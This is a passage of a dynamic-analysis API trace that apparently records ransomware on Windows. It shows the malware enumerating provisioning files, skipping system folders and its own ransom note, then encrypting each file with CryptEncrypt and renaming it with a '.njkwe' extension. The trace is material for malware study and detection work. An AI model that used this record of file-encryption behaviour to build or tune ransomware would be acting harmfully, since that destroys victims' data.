lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.764] lstrcmpW (lpString1="382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.764] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\382__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.764] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\382__connections_cellular_mobileone (singapore)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.764] GetTickCount () returned 0x1154051 [0078.764] GetTickCount () returned 0x1154051 [0078.764] GetTickCount () returned 0x1154051 [0078.765] GetTickCount () returned 0x1154051 [0078.765] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.765] GetProcessHeap () returned 0xbe0000 [0078.765] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.765] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0078.766] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.766] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0078.766] GetProcessHeap () returned 0xbe0000 [0078.766] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.766] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.766] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.767] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.767] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.767] CloseHandle (hObject=0x43c) returned 1 [0078.767] GetProcessHeap () returned 0xbe0000 [0078.767] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.767] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\382__connections_cellular_mobileone (singapore)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\382__Connections_Cellular_MobileOne (Singapore)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\382__connections_cellular_mobileone (singapore)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.768] GetProcessHeap () returned 0xbe0000 [0078.768] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.768] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e0de39, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e0de39, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e0de39, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml", cAlternateFileName="383__C~1.PRO")) returned 1 [0078.768] lstrcmpiW (lpString1="383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.768] lstrcmpiW (lpString1="383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.768] lstrcmpiW (lpString1="383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.768] lstrcmpiW (lpString1="383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.768] lstrcmpiW (lpString1="383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.768] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml") returned 165 [0078.768] StrStrIW (lpFirst="383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.768] lstrcmpW (lpString1="383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.768] lstrcmpW (lpString1="383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.769] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\383__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.769] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\383__connections_cellular_mobileone (singapore)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.770] GetTickCount () returned 0x1154051 [0078.770] GetTickCount () returned 0x1154051 [0078.770] GetTickCount () returned 0x1154051 [0078.770] GetTickCount () returned 0x1154051 [0078.770] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.770] GetProcessHeap () returned 0xbe0000 [0078.770] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.770] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0078.772] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.772] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0078.772] GetProcessHeap () returned 0xbe0000 [0078.772] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.772] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.772] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.773] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.773] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.773] CloseHandle (hObject=0x43c) returned 1 [0078.773] GetProcessHeap () returned 0xbe0000 [0078.773] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.773] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.773] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\383__connections_cellular_mobileone (singapore)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\383__Connections_Cellular_MobileOne (Singapore)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\383__connections_cellular_mobileone (singapore)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.798] GetProcessHeap () returned 0xbe0000 [0078.799] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.799] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e0de39, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e0de39, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e0de39, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml", cAlternateFileName="384__C~1.PRO")) returned 1 [0078.799] lstrcmpiW (lpString1="384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.799] lstrcmpiW (lpString1="384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.799] lstrcmpiW (lpString1="384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.799] lstrcmpiW (lpString1="384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.799] lstrcmpiW (lpString1="384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.799] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml") returned 163 [0078.799] StrStrIW (lpFirst="384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.799] lstrcmpW (lpString1="384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.799] lstrcmpW (lpString1="384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.799] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\384__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.799] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\384__connections_cellular_singtel (singapore)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.799] GetTickCount () returned 0x1154070 [0078.799] GetTickCount () returned 0x1154070 [0078.799] GetTickCount () returned 0x1154070 [0078.799] GetTickCount () returned 0x1154070 [0078.800] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.800] GetProcessHeap () returned 0xbe0000 [0078.800] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.800] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0078.803] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.803] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0078.803] GetProcessHeap () returned 0xbe0000 [0078.803] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.803] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.804] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.804] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.804] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.804] CloseHandle (hObject=0x43c) returned 1 [0078.804] GetProcessHeap () returned 0xbe0000 [0078.804] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.804] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\384__connections_cellular_singtel (singapore)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\384__Connections_Cellular_Singtel (Singapore)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\384__connections_cellular_singtel (singapore)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.805] GetProcessHeap () returned 0xbe0000 [0078.805] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.805] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e0de39, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e0de39, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e0de39, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml", cAlternateFileName="385__C~1.PRO")) returned 1 [0078.805] lstrcmpiW (lpString1="385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.805] lstrcmpiW (lpString1="385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.805] lstrcmpiW (lpString1="385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.805] lstrcmpiW (lpString1="385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.805] lstrcmpiW (lpString1="385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.805] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml") returned 163 [0078.805] StrStrIW (lpFirst="385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.805] lstrcmpW (lpString1="385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.806] lstrcmpW (lpString1="385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.806] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\385__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.806] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\385__connections_cellular_singtel (singapore)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.806] GetTickCount () returned 0x1154070 [0078.806] GetTickCount () returned 0x1154070 [0078.806] GetTickCount () returned 0x1154070 [0078.806] GetTickCount () returned 0x1154070 [0078.806] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.806] GetProcessHeap () returned 0xbe0000 [0078.806] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.806] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.811] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.811] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.811] GetProcessHeap () returned 0xbe0000 [0078.811] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.811] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.811] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.811] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.811] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.811] CloseHandle (hObject=0x43c) returned 1 [0078.812] GetProcessHeap () returned 0xbe0000 [0078.812] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.812] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\385__connections_cellular_singtel (singapore)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\385__Connections_Cellular_Singtel (Singapore)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\385__connections_cellular_singtel (singapore)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.813] GetProcessHeap () returned 0xbe0000 [0078.813] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.813] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e0de39, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e0de39, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e0de39, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml", cAlternateFileName="386__C~1.PRO")) returned 1 [0078.813] lstrcmpiW 